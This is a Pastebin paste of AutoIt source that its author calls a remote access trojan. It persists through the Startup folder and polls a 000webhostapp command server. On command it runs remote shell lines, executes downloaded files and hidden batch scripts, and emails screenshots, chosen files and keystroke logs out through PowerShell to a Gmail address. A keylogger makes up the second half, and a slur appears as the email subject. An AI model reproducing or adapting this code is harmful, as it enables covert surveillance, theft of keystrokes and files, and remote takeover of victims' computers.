API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 19th, 2017
134
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.48 KB | None | 0 0
raw download clone embed print report
  1. #include <InetConstants.au3>
  2. #include <MsgBoxConstants.au3>
  3. #include <WinAPIFiles.au3>
  4. #include <Misc.au3>
  5. #include <WindowsConstants.au3>
  6. #include <AutoItConstants.au3>
  7. #include <ScreenCapture.au3>
  8. ;this is the client side version of a silly rat i am working on
  9. Global $exename = "ratattempt.exe"
  10. ;stage will controll what the rat is doing locally, for example. stage 0 is look for instructions
  11. If Not FileExists(@StartupDir & "/" & $exename) Then
  12. FileCopy(@ScriptFullPath, @StartupDir)
  13. EndIf
  14. Global $herenum = 0 ; for use in hiddenshell
  15. Global $sURL = 'http://isavigualco.000webhostapp.com/'
  16. Global $num = 1
  17. Global $stage = 0
  18. While(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "keylog")
  19. ;While (true)
  20. ;rat must get instructions
  21. Sleep(4000)
  22. while ($stage == 0);read commands
  23. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "instructions" Then
  24. $stage = -1;
  25. EndIf
  26. $num = $num + 1
  27.  
  28. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "keylog" Then
  29. $stage = 1;
  30. EndIf
  31. $num = $num + 1
  32. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "cmd" Then
  33. $stage = 2;
  34. EndIf
  35. $num = $num + 1
  36. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "printscreen" Then
  37. $stage = 3;
  38. EndIf
  39. $num = $num + 1
  40. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  41. $stage = 4;
  42. EndIf
  43. $num = $num + 1
  44. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "troll" Then
  45. $stage = 5;
  46. EndIf
  47. $num = $num + 1
  48.  
  49. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  50. $stage = 6;
  51. EndIf
  52. $num = $num + 1
  53. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "flipout" Then
  54. $stage = 7;
  55. EndIf
  56. $num = $num + 1
  57. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "closecommonapps" Then
  58. $stage = 8;
  59. EndIf
  60. $num = $num + 1
  61. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hiddenshell" Then
  62. $stage = 9;
  63. EndIf
  64. $num = $num + 1
  65. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "download" Then
  66. $stage = 10;
  67. EndIf
  68. $num = $num + 1
  69. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hprintscreen" Then
  70. $stage = 11;
  71. EndIf
  72. $num = $num + 1
  73. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "upload" Then
  74. $stage = 12;
  75. EndIf
  76. $num = $num + 1
  77.  
  78.  
  79. WEnd
  80. While($stage == 2);cmd
  81. If _Singleton("cmd.exe") <> 0 Then
  82. Run("cmd.exe")
  83. EndIf
  84. ;Run( @startupdir & "/" & $exename)
  85. Sleep(30000)
  86. Run( @startupdir & "/" & $exename)
  87. $num = $num + 1
  88. Global $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  89. $num = $num + 1
  90. Send($cmdline)
  91. Send("{ENTER}")
  92.  
  93. While BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "returnzero"
  94. $num = $num + 1
  95. $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  96. Sleep(10000)
  97. Send($cmdline)
  98. Send("{ENTER}")
  99.  
  100. WEnd
  101. $num = $num + 1
  102. If _Singleton("cmd.exe") = 0 Then
  103. ProcessClose ( "cmd.exe" )
  104. EndIf
  105.  
  106. $stage = 0
  107. WEnd
  108. While ($stage == 3);printscreen
  109. Local $hDLL = DllOpen("USER32.dll")
  110. DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", 2);
  111. _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  112. $num = $num + 1
  113. While($stage = 3)
  114. Global $mouseposition = MouseGetPos()
  115. Sleep(30000)
  116. Global $mousepositios = MouseGetPos()
  117. if $mouseposition == $mousepositios Then
  118. Sleep(3000)
  119. Run("cmd.exe")
  120. Sleep(1000)
  121. Send("Start Powershell")
  122. Send("{ENTER}")
  123. Sleep(7000)
  124. Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  125. ;Send($filecontent);
  126. ;FileClose($file)
  127. Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  128. Send(" -Attachments ")
  129. Send(@MyDocumentsDir)
  130.  
  131. Send("\GDIPlus_Image1.jpg")
  132. ;Send($date)
  133. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  134.  
  135. Send("{ENTER}")
  136. Sleep(2000)
  137. Send("pass");
  138.  
  139. Send("{ENTER}")
  140. ;FileOpen($log)
  141. Sleep(60000)
  142. ProcessClose("cmd.exe")
  143. ProcessClose("Powershell.exe")
  144. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  145. $stage = 0;
  146.  
  147. EndIf
  148. Sleep(30000)
  149.  
  150. EndIf
  151. $stage = 0;
  152.  
  153. WEnd
  154.  
  155. DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", -1)
  156. Wend
  157. While($stage == 4);kill
  158. ProcessClose("cmd.exe")
  159. ProcessClose("powershell.exe")
  160. ProcessClose($exename)
  161. Exit 0
  162.  
  163. Wend
  164. While($stage == 5);troll
  165. Send("e")
  166. Sleep(10000)
  167. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  168. $stage = 0;
  169. EndIf
  170. $num = $num + 1
  171. WEnd
  172. While($stage == 6);obliterate
  173. ProcessClose("cmd.exe")
  174. ProcessClose("powershell.exe")
  175. FileDelete(@StartupDir & "/" & $exename)
  176. FileDelete(@TempDir & "\setup.exe")
  177. FileDelete(@TempDir & "/testandofileopen.bat", $FO_APPEND)
  178. ProcessClose($exename)
  179. FileDelete(@TempDir & "\setup.exe")
  180. WEnd
  181. While($stage == 7);flipout
  182. Sleep(3000)
  183. if Random(0,10,1) > 7 Then
  184. Send("{CTRLDOWN}")
  185. Send("{ALTDOWN}")
  186. Send("{DOWN}")
  187. Send("{ALTUP}")
  188. Send("{CTRLUP}")
  189.  
  190. Endif
  191. $num = $num + 1
  192. Sleep(3000)
  193. if Random(0,10,1) > 7 Then
  194. Send("{CTRLDOWN}")
  195. Send("{ALTDOWN}")
  196. Send("{DEL}")
  197. Send("{ALTUP}")
  198. Send("{CTRLUP}")
  199. Endif
  200. Sleep(3000)
  201. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  202. $stage = 0;
  203. EndIf
  204. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  205. $stage = 4;
  206. EndIf
  207. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  208. $stage = 6;
  209. EndIf
  210.  
  211. WEnd
  212. While($stage == 8);closeapps
  213. If _Singleton("cmd.exe") = 0 Then
  214. ProcessClose ( "cmd.exe" )
  215. EndIf
  216. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  217. $stage = 0;
  218. EndIf
  219. $num = $num + 1
  220.  
  221. ProcessClose("chrome.exe")
  222.  
  223.  
  224. ;ProcessClose("chrome.exe")
  225.  
  226. ;iexplore.exe
  227.  
  228. ProcessClose("iexplore.exe" )
  229.  
  230.  
  231. ProcessClose("winword.exe" )
  232.  
  233.  
  234. ProcessClose("powerpnt.exe")
  235.  
  236. $num = $num + 1
  237. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  238. $stage = 0;
  239. EndIf
  240. $num = $num + 1
  241. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  242. $stage = 4;
  243. EndIf
  244. $num = $num + 1
  245. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  246. $stage = 6;
  247. EndIf
  248.  
  249. ProcessClose("firefox.exe")
  250.  
  251.  
  252. ProcessClose("mspaint.exe")
  253.  
  254.  
  255. ProcessClose("notepad.exe")
  256.  
  257. $num = $num + 1
  258. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  259. $stage = 0;
  260. EndIf
  261.  
  262. WEnd
  263. While($stage == 9);HIDDENSHELL
  264.  
  265. Sleep(12000)
  266.  
  267. if $herenum = 0 then
  268. Local $oShell = ObjCreate("shell.application")
  269. $herenum = $herenum + 1
  270. $ShellObj=ObjCreate("WScript.Shell")
  271. $file = FileOpen(@TempDir & "/testandofileopen.bat", $FO_APPEND)
  272. Endif
  273. $num = $num + 1
  274.  
  275. $num = $num + 1
  276. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "close" Then
  277. FileWriteLine($file,BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) )
  278. EndIf
  279. $num = $num + 1
  280.  
  281. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "close" Then
  282. FileClose($file)
  283. $num = $num + 1
  284. $ShellObj.Run("C://temp/testandofileopen.bat", 0)
  285. $num = $num + 1
  286. $ShellObj = Null
  287. $herenum = 0;
  288. $num = $num + 1
  289. EndIf
  290. sleep(5000)
  291. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  292. $stage = 0
  293.  
  294. EndIf
  295. WEnd
  296. While($stage == 10);Download and run
  297. Sleep(30000)
  298. Local $FileURL = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  299. Local $FileName = @TempDir & "\Setup.exe"
  300. ;$FileSaveLocation = FileSaveDialog("Save Location...",@ScriptDir,"All (*.*)",18,$FileName)
  301. $FileSize = InetGetSize($FileURL)
  302.  
  303. InetGet($FileURL,$FileName,0,1)
  304. While @InetGetActive
  305. $Percentage = @InetGetBytesRead * 100 / $FileSize
  306. ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " & $FileSize & " bytes","Downloading " & $FileName)
  307. Sleep(250)
  308. Wend
  309. ProgressOff()
  310. ShellExecute (@TempDir & "\setup.exe") ; you may use Run (), RunWait () or ShellExecuteWait depending on setup.exe
  311. ;If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  312. $stage = 0
  313.  
  314. ;EndIf
  315. WEnd
  316. While($stage == 11);hprintscreen
  317. ; Run('calc')
  318. ;Sleep(1000)
  319. ;WinWait('Calculator')
  320. ;Sleep(1000) ; Hide window with next line
  321. ;WinSetState('Calculator', '', @SW_HIDE)
  322. ;ControlClick('Calculator', '', '6')
  323. ;ControlClick('Calculator', '', '+')
  324. ;ControlClick('Calculator', '', '6')
  325. ;ControlClick('Calculator', '', '=')
  326. ;Sleep(1000) ; Show window with next line
  327. ;WinSetState('Calculator', '', @SW_SHOW)
  328. _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  329. $num = $num + 1
  330. While($stage = 11)
  331. Global $mouseposition = MouseGetPos()
  332. Sleep(30000)
  333. Global $mousepositios = MouseGetPos()
  334. if $mouseposition == $mousepositios Then
  335. Sleep(3000)
  336. Run("powershell.exe")
  337. WinWait("Windows PowerShell")
  338. WinSetState("Windows PowerShell", "", @SW_HIDE)
  339. ;Send("Start Powershell")
  340. ;Send("{ENTER}")
  341. ;Sleep(7000)
  342. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  343. ;Send($filecontent);
  344. ;FileClose($file)
  345. ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  346. ControlSend("Windows PowerShell","", ""," -Attachments ")
  347. ControlSend("Windows PowerShell","", "",@MyDocumentsDir)
  348.  
  349. ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
  350. ;Send($date)
  351. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  352.  
  353. ControlSend("Windows PowerShell","", "","{ENTER}")
  354. ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
  355. WinWait("Solicitação de credenciais do Windows PowerShell")
  356. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  357. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  358.  
  359. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  360. ;FileOpen($log)
  361. Sleep(60000)
  362. ProcessClose("cmd.exe")
  363. ProcessClose("Powershell.exe")
  364. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  365. $stage = 0;
  366.  
  367. EndIf
  368. Sleep(30000)
  369. FileDelete(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  370. EndIf
  371. $stage = 0;
  372. WEnd
  373. WEnd
  374. While($stage == 12);upload
  375. Sleep(12000)
  376. $num = $num + 1
  377. If FileExists(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))) Then
  378. Sleep(3000)
  379. Run("powershell.exe")
  380. WinWait("Windows PowerShell");dir<carpeta> >> files.txt
  381. WinSetState("Windows PowerShell", "", @SW_HIDE)
  382. $num = $num + 1
  383. ;Send("Start Powershell")
  384. ;Send("{ENTER}")
  385. ;Sleep(7000)
  386. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  387. ;Send($filecontent);
  388. ;FileClose($file)
  389. ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  390. ControlSend("Windows PowerShell","", ""," -Attachments ")
  391. ControlSend("Windows PowerShell","", "",BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)))
  392.  
  393. ;ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
  394. ;Send($date)
  395. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  396.  
  397. ControlSend("Windows PowerShell","", "","{ENTER}")
  398. ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
  399. WinWait("Solicitação de credenciais do Windows PowerShell")
  400. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  401. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  402.  
  403. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  404. ;FileOpen($log)
  405. Sleep(60000)
  406. ProcessClose("cmd.exe")
  407. ProcessClose("Powershell.exe")
  408. $num = $num + 1
  409. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  410. $stage = 0;
  411.  
  412. EndIf
  413.  
  414. EndIf
  415. WEnd
  416.  
  417. WEnd
  418.  
  419.  
  420.  
  421.  
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428.  
  429.  
  430.  
  431.  
  432.  
  433.  
  434.  
  435.  
  436. ;While($stage == 1);Keylogger
  437. ;======================================== Variables ============================================
  438. $hDll=DllOpen("user32.dll")
  439. $window2=""
  440. Global $date=@year&@mon&@mday
  441. $log=@ScriptDir&"/log"; Ðu?ng d?n t?i file log
  442. $keystroke=""
  443. ;$hexKey = '0x' & $hexKey
  444. ;===============================================================================================
  445.  
  446. ;======================================== Directory ============================================
  447. DirCreate ($log)
  448. $file = FileOpen($log&"\logfiles"&$date&".htm", 1+256) ; T?o log luu tr? n?i dung capture (UTF-8)
  449. If $file = -1 Then ; thoát n?u g?p l?i
  450. Exit
  451. EndIf
  452.  
  453. filewrite($file,'<font face=Verdana size=1>')
  454.  
  455. ;Send-MailMessage -To $to -From $MyEmail -Subject $Subject -Body $Body -SmtpServer $SMTP -Credential (Get-Credential -Credential "$MyEmail")
  456.  
  457. ;-UseSsl -Port 587 -DeliveryNotificationOption never
  458. ;===============================================================================================
  459.  
  460. Func terminate()
  461. DllClose($hDll)
  462. Exit 0
  463. EndFunc
  464. ;Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body body -SmtpServer smtp.gmail.com -Credential (Get-Credential -Credential "isavigualco@gmail.com")-UseSsl -Port 587 -DeliveryNotificationOption never
  465. ;======================================== LogWrite ============================================
  466.  
  467. Func _LogKeyPress($what2log)
  468. $window=WinGetTitle("")
  469. Switch $window
  470. Case $window2
  471. FileWrite($file,$what2log)
  472. Sleep(100)
  473. Case Else
  474. $window2=$window
  475.  
  476.  
  477. $main="<b>["& @Year&"."&@mon&"."&@mday&" "&@HOUR & ":" &@MIN & ":" &@SEC & '] Window: "'& $window& '"</b></br>'& $what2log
  478.  
  479.  
  480. If $window="Yahoo! Messenger" then
  481. FileWrite($file, '<br><BR><img src="yahoo.png" width=30 height=30>' & $main)
  482. ElseIf StringInStr($window,"Google Chrome") then
  483. FileWrite($file, '<br><BR><img src="chrome.png" width=30 height=30>' & $main)
  484. ElseIf StringInStr($window,"Mozilla Firefox") then
  485. FileWrite($file, '<br><BR><img src="Firefox.png" width=30 height=30>' & $main)
  486. ElseIf StringInStr($window,"Windows Internet Explorer") then
  487. FileWrite($file, '<br><BR><img src="IE.png" width=30 height=30>' & $main)
  488. EndIf ; Set icon cho m?t s? chuong trình thông d?ng d? ti?n theo dõi log
  489.  
  490. sleep (100)
  491. EndSwitch
  492. EndFunc
  493.  
  494. ;===============================================================================================
  495.  
  496. $Dllcall = DllOpen("user32.dll")
  497.  
  498. ;Call DLL d? s? d?ng hàm _IsPressed là hàm chính c?a keylogger
  499.  
  500. ;======================================== Alphabets ============================================
  501. While 1
  502.  
  503. If _IsPressed('6A',$Dllcall) Then
  504. local $a
  505. $a=terminate()
  506. EndIf
  507.  
  508. If _IsPressed(41,$Dllcall) Then ;if return 1
  509. _LogKeyPress("a")
  510. EndIf
  511.  
  512.  
  513. If _IsPressed(42,$Dllcall) Then
  514. _LogKeyPress("b")
  515. EndIf
  516.  
  517.  
  518. If _IsPressed(43,$Dllcall) Then
  519. _LogKeyPress("c")
  520. EndIf
  521.  
  522.  
  523. If _IsPressed(44,$Dllcall) Then
  524. _LogKeyPress("d")
  525. EndIf
  526.  
  527.  
  528. If _IsPressed(45,$Dllcall) Then
  529. _LogKeyPress("e")
  530. EndIf
  531.  
  532.  
  533. If _IsPressed(46,$Dllcall) Then
  534. _LogKeyPress("f")
  535. EndIf
  536.  
  537.  
  538. If _IsPressed(47,$Dllcall) Then
  539. _LogKeyPress("g")
  540. EndIf
  541.  
  542.  
  543. If _IsPressed(48,$Dllcall) Then
  544. _LogKeyPress("h")
  545. EndIf
  546.  
  547.  
  548. If _IsPressed(49,$Dllcall) Then
  549. _LogKeyPress("i")
  550. EndIf
  551.  
  552.  
  553. If _IsPressed('4a',$Dllcall) Then
  554. _LogKeyPress("j")
  555. EndIf
  556.  
  557.  
  558. If _IsPressed('4b',$Dllcall) Then
  559. _LogKeyPress("k")
  560. EndIf
  561.  
  562.  
  563. If _IsPressed('4c',$Dllcall) Then
  564. _LogKeyPress("l")
  565. EndIf
  566.  
  567.  
  568. If _IsPressed('4d',$Dllcall) Then
  569. _LogKeyPress("m")
  570. EndIf
  571.  
  572.  
  573. If _IsPressed('4e',$Dllcall) = 1 Then
  574. _LogKeyPress("n")
  575. EndIf
  576.  
  577.  
  578. If _IsPressed('4f',$Dllcall) Then
  579. _LogKeyPress("o")
  580. EndIf
  581.  
  582.  
  583. If _IsPressed(50,$Dllcall) Then
  584. _LogKeyPress("p")
  585. EndIf
  586.  
  587.  
  588. If _IsPressed(51,$Dllcall) Then
  589. _LogKeyPress("q")
  590. EndIf
  591.  
  592.  
  593. If _IsPressed(52,$Dllcall) Then
  594. _LogKeyPress("r")
  595. EndIf
  596.  
  597.  
  598. If _IsPressed(53,$Dllcall) Then
  599. _LogKeyPress("s")
  600. EndIf
  601.  
  602.  
  603. If _IsPressed(54,$Dllcall) Then
  604. _LogKeyPress("t")
  605. EndIf
  606.  
  607.  
  608. If _IsPressed(55,$Dllcall) Then
  609. _LogKeyPress("u")
  610. EndIf
  611.  
  612.  
  613. If _IsPressed(56,$Dllcall) Then
  614. _LogKeyPress("v")
  615. EndIf
  616.  
  617.  
  618. If _IsPressed(57,$Dllcall) Then
  619. _LogKeyPress("w")
  620. EndIf
  621.  
  622.  
  623. If _IsPressed(58,$Dllcall) Then
  624. _LogKeyPress("x")
  625. EndIf
  626.  
  627.  
  628. If _IsPressed(59,$Dllcall) Then
  629. _LogKeyPress("y")
  630. EndIf
  631.  
  632. If _IsPressed('5a',$Dllcall) Then
  633. _LogKeyPress("z")
  634. EndIf
  635.  
  636. ;========================================================================================
  637.  
  638. ;=================================== Numbers ===========================================
  639. If _IsPressed('30',$Dllcall) Then
  640. _LogKeyPress("0")
  641. EndIf
  642.  
  643.  
  644. If _IsPressed('31',$Dllcall) Then
  645. _LogKeyPress("1")
  646. EndIf
  647.  
  648.  
  649. If _IsPressed('32',$Dllcall) Then
  650. _LogKeyPress("2")
  651. EndIf
  652.  
  653.  
  654. If _IsPressed('33',$Dllcall) Then
  655. _LogKeyPress("3")
  656. EndIf
  657.  
  658.  
  659. If _IsPressed('34',$Dllcall) Then
  660. _LogKeyPress("4")
  661. EndIf
  662.  
  663.  
  664. If _IsPressed('35',$Dllcall) Then
  665. _LogKeyPress("5")
  666. EndIf
  667.  
  668.  
  669. If _IsPressed('36',$Dllcall) Then
  670. _LogKeyPress("6")
  671. EndIf
  672.  
  673.  
  674. If _IsPressed('37',$Dllcall) Then
  675. _LogKeyPress("7")
  676. EndIf
  677.  
  678.  
  679. If _IsPressed('38',$Dllcall) Then
  680. _LogKeyPress("8")
  681. EndIf
  682.  
  683.  
  684. If _IsPressed('39',$Dllcall) Then
  685. _LogKeyPress("9")
  686. EndIf
  687. ;===================================================================================
  688.  
  689.  
  690. ;=================================== Keystrokes ====================================
  691. If _IsPressed('20',$Dllcall) Then
  692. _LogKeyPress(" ")
  693. EndIf
  694.  
  695.  
  696. If _IsPressed('08',$Dllcall) Then
  697. _LogKeyPress("{BACKSPACE}")
  698. EndIf
  699.  
  700.  
  701. If _IsPressed('09',$Dllcall) Then
  702. _LogKeyPress("{TAB}")
  703. EndIf
  704.  
  705.  
  706. If _IsPressed('0d',$Dllcall) Then
  707. _LogKeyPress("{ENTER}")
  708. EndIf
  709.  
  710. If _IsPressed('10',$Dllcall) Then
  711.  
  712. _LogKeyPress("{SHIFT}")
  713.  
  714. While _IsPressed("10")
  715.  
  716. If _IsPressed('BA',$Dllcall) Then
  717. _LogKeyPress(";")
  718. ElseIf _IsPressed('BB',$Dllcall) Then
  719. _LogKeyPress("+")
  720. ElseIf _IsPressed('BC',$Dllcall) Then
  721. _LogKeyPress("<")
  722. ElseIf _IsPressed('BD',$Dllcall) Then
  723. _LogKeyPress("_")
  724. ElseIf _IsPressed('BE',$Dllcall) Then
  725. _LogKeyPress(">")
  726. ElseIf _IsPressed('BF',$Dllcall) Then
  727. _LogKeyPress("?")
  728. ElseIf _IsPressed('DB',$Dllcall) Then
  729. _LogKeyPress("{")
  730. ElseIf _IsPressed('DC',$Dllcall) Then
  731. _LogKeyPress("|")
  732. ElseIf _IsPressed('DD',$Dllcall) Then
  733. _LogKeyPress("}")
  734. ElseIf _IsPressed('30',$Dllcall) Then
  735. _LogKeyPress(")")
  736. ElseIf _IsPressed('31',$Dllcall) Then
  737. _LogKeyPress("!")
  738. ElseIf _IsPressed('32',$Dllcall) Then
  739. _LogKeyPress("@")
  740. ElseIf _IsPressed('33',$Dllcall) Then
  741. _LogKeyPress("#")
  742. ElseIf _IsPressed('34',$Dllcall) Then
  743. _LogKeyPress("$")
  744. ElseIf _IsPressed('35',$Dllcall) Then
  745. _LogKeyPress("%")
  746. ElseIf _IsPressed('36',$Dllcall) Then
  747. _LogKeyPress("^")
  748. ElseIf _IsPressed('37',$Dllcall) Then
  749. _LogKeyPress("&")
  750. ElseIf _IsPressed('38',$Dllcall) Then
  751. _LogKeyPress("*")
  752. ElseIf _IsPressed('39',$Dllcall) Then
  753. _LogKeyPress("(")
  754.  
  755. EndIf
  756.  
  757. Sleep(10) ; important to prevent 100% CPU usage in this tight little loop
  758. WEnd
  759. EndIf
  760.  
  761. If _IsPressed('14',$Dllcall) Then
  762. _LogKeyPress("{CAPSLOCK}")
  763. EndIf
  764.  
  765.  
  766. If _IsPressed('1b',$Dllcall) Then
  767. _LogKeyPress("{ESC}")
  768. EndIf
  769.  
  770. If _IsPressed('23',$Dllcall) Then
  771. _LogKeyPress("{END}")
  772. EndIf
  773.  
  774.  
  775. If _IsPressed('24',$Dllcall) Then
  776. _LogKeyPress("{HOME}")
  777. EndIf
  778.  
  779.  
  780. If _IsPressed('25',$Dllcall) Then
  781. _LogKeyPress("{LEFT ARROW}")
  782. EndIf
  783.  
  784.  
  785. If _IsPressed('26',$Dllcall) Then
  786. _LogKeyPress("{UP ARROW}")
  787. EndIf
  788.  
  789.  
  790. If _IsPressed('27',$Dllcall) Then
  791. _LogKeyPress("{RIGHT ARROW}")
  792. EndIf
  793.  
  794.  
  795. If _IsPressed('28',$Dllcall) Then
  796. _LogKeyPress("{DOWN ARROW}")
  797. EndIf
  798.  
  799.  
  800.  
  801. If _IsPressed('2e',$Dllcall) Then
  802. _LogKeyPress("{DEL}")
  803. EndIf
  804.  
  805. If _IsPressed('BA',$Dllcall) Then
  806. _LogKeyPress(";")
  807. EndIf
  808.  
  809.  
  810. If _IsPressed('BB',$Dllcall) Then
  811. _LogKeyPress("=")
  812. Mail()
  813. EndIf
  814.  
  815.  
  816. If _IsPressed('BC',$Dllcall) Then
  817. _LogKeyPress(",")
  818. EndIf
  819.  
  820.  
  821. If _IsPressed('BD',$Dllcall) Then
  822. _LogKeyPress("-")
  823. EndIf
  824.  
  825.  
  826. If _IsPressed('BE',$Dllcall) Then
  827. _LogKeyPress(".")
  828. EndIf
  829.  
  830.  
  831. If _IsPressed('BF',$Dllcall) Then
  832. _LogKeyPress("/")
  833. EndIf
  834.  
  835.  
  836. If _IsPressed('DB',$Dllcall) Then
  837. _LogKeyPress("[")
  838. EndIf
  839.  
  840. If _IsPressed('DC',$Dllcall) Then
  841. _LogKeyPress("\")
  842. EndIf
  843.  
  844. If _IsPressed('DD',$Dllcall) Then
  845. _LogKeyPress("]")
  846. EndIf
  847. $num = $num + 1
  848. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  849. $stage = 0;
  850. Mail()
  851. Send("=")
  852. EndIf
  853. $num = $num + 1
  854. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "dumpkeyscan" Then
  855. Send("=")
  856. Mail()
  857. EndIf
  858. $num = $num + 1
  859. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  860. ProcessClose("cmd.exe")
  861. ProcessClose("powershell.exe")
  862. ProcessClose($exename)
  863. Exit 0
  864.  
  865.  
  866. EndIf
  867. ;
  868. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  869.  
  870. ProcessClose("cmd.exe")
  871. ProcessClose("powershell.exe")
  872. FileDelete(@StartupDir & "/" & $exename)
  873. ProcessClose($exename)
  874. EndIf
  875. ;Global $filecontent = FileRead($log)
  876.  
  877. ;Global $mouseposition = MouseGetPos()
  878. ;Sleep(300000)
  879. ;Global $mousepositios = MouseGetPos()
  880. ;if $mouseposition == $mousepositios Then
  881. ; Run("cmd.exe")
  882. ; Sleep(100)
  883. ;Send("Start Powershell")
  884. ;Send("{ENTER}")
  885. ;Sleep(3000)
  886. ;Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  887. ;Send($filecontent);
  888. ;FileClose($file)
  889. ;Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  890. ;Send(" -Attachments ")
  891. ;Send(@scriptdir)
